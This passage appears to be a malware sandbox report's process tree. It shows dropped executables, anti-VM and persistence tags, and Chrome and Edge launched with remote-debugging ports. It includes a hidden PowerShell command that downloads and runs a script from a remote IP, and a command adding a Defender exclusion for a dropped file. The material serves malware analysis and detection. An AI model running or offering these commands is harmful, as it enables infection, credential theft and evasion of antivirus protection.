                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4724,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4880 /prefetch:8
                                                            9⤵
                                                              PID:4568
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4192,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4868 /prefetch:8
                                                              9⤵
                                                                PID:4360
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4948,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5088 /prefetch:8
                                                                9⤵
                                                                  PID:3048
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5136,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3636 /prefetch:8
                                                                  9⤵
                                                                    PID:552
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5092 /prefetch:8
                                                                    9⤵
                                                                      PID:4908
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5160 /prefetch:8
                                                                      9⤵
                                                                        PID:1376
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5156,i,7144072355654185731,10699023148760014984,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5236 /prefetch:2
                                                                        9⤵
                                                                        • Uses browser remote debugging
                                                                        PID:3284
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                      8⤵
                                                                      • Uses browser remote debugging
                                                                      • Enumerates system info in registry
                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                      PID:3952
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffccfae46f8,0x7ffccfae4708,0x7ffccfae4718
                                                                        9⤵
                                                                        • Checks processor information in registry
                                                                        • Enumerates system info in registry
                                                                        PID:5412
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2028 /prefetch:2
                                                                        9⤵
                                                                          PID:4092
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2416 /prefetch:3
                                                                          9⤵
                                                                            PID:5304
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
                                                                            9⤵
                                                                              PID:5448
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                                              9⤵
                                                                              • Uses browser remote debugging
                                                                              PID:4284
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
                                                                              9⤵
                                                                              • Uses browser remote debugging
                                                                              PID:5024
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2052 /prefetch:2
                                                                              9⤵
                                                                                PID:3460
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2000 /prefetch:2
                                                                                9⤵
                                                                                  PID:1900
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2876 /prefetch:2
                                                                                  9⤵
                                                                                    PID:1904
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:1
                                                                                    9⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:4628
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2436 /prefetch:1
                                                                                    9⤵
                                                                                    • Uses browser remote debugging
                                                                                    PID:4796
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2400 /prefetch:2
                                                                                    9⤵
                                                                                      PID:4516
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2392 /prefetch:2
                                                                                      9⤵
                                                                                        PID:5760
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2332 /prefetch:2
                                                                                        9⤵
                                                                                          PID:4352
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4832 /prefetch:2
                                                                                          9⤵
                                                                                            PID:5560
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,2662800545307893389,9300712833625842841,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4896 /prefetch:2
                                                                                            9⤵
                                                                                              PID:5928
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110190101\zY9sqWs.exe"
                                                                                          7⤵
                                                                                          • Drops startup file
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:5328
                                                                                        • C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
                                                                                          7⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          PID:5372
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\33AD.tmp\33AE.tmp\33AF.bat C:\Users\Admin\AppData\Local\Temp\10110200101\PcAIvJ0.exe"
                                                                                            8⤵
                                                                                              PID:2440
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
                                                                                                9⤵
                                                                                                • Blocklisted process makes network request
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:2452
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
                                                                                                  10⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Drops startup file
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4360
                                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\spfwia3k\spfwia3k.cmdline"
                                                                                                    11⤵
                                                                                                      PID:5964
                                                                                                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES729B.tmp" "c:\Users\Admin\AppData\Local\Temp\spfwia3k\CSC16FAC266BB6C4C98809577CC448FE39D.TMP"
                                                                                                        12⤵
                                                                                                          PID:6128
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10110210101\v6Oqdnc.exe"
                                                                                                7⤵
                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                • Checks BIOS information in registry
                                                                                                • Executes dropped EXE
                                                                                                • Identifies Wine through registry keys
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                PID:5388
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5920
                                                                                                • C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10110220101\MCxU5Fj.exe"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:5648
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5920 -s 800
                                                                                                  8⤵
                                                                                                  • Program crash
                                                                                                  PID:5596
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10110230101\ce4pMzk.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10110230101\ce4pMzk.exe"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Adds Run key to start application
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5624
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\0fFPRrZZ\Anubis.exe""
                                                                                                  8⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:4512
                                                                                              • C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
                                                                                                7⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetThreadContext
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2968
                                                                                                • C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:6092
                                                                                                • C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\10110240101\mAtJWNv.exe"
                                                                                                  8⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Checks processor information in registry
                                                                                                  PID:3960
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                    9⤵
                                                                                                    • Uses browser remote debugging
                                                                                                    PID:5560
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffccb52cc40,0x7ffccb52cc4c,0x7ffccb52cc58
                                                                                                      10⤵
                                                                                                        PID:6112
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                      9⤵
                                                                                                      • Uses browser remote debugging
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1060
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffccb52cc40,0x7ffccb52cc4c,0x7ffccb52cc58
                                                                                                        10⤵
                                                                                                          PID:3300
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2336,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2332 /prefetch:2
                                                                                                          10⤵
                                                                                                            PID:228
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1720,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2368 /prefetch:3
                                                                                                            10⤵
                                                                                                              PID:2456
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2000,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2472 /prefetch:8
                                                                                                              10⤵
                                                                                                                PID:5736
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3124 /prefetch:1
                                                                                                                10⤵
                                                                                                                • Uses browser remote debugging
                                                                                                                PID:468
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3144,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3172 /prefetch:1
                                                                                                                10⤵
                                                                                                                • Uses browser remote debugging
                                                                                                                PID:3628
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4524 /prefetch:1
                                                                                                                10⤵
                                                                                                                • Uses browser remote debugging
                                                                                                                PID:5436
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4656,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8
                                                                                                                10⤵
                                                                                                                  PID:1052
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3108,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4820 /prefetch:8
                                                                                                                  10⤵
                                                                                                                    PID:116
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,548217159109246026,14626809823516645602,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4256 /prefetch:8
                                                                                                                    10⤵
                                                                                                                      PID:6876
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                    9⤵
                                                                                                                    • Uses browser remote debugging
                                                                                                                    PID:7036
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffccfae46f8,0x7ffccfae4708,0x7ffccfae4718
                                                                                                                      10⤵
                                                                                                                        PID:6940
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
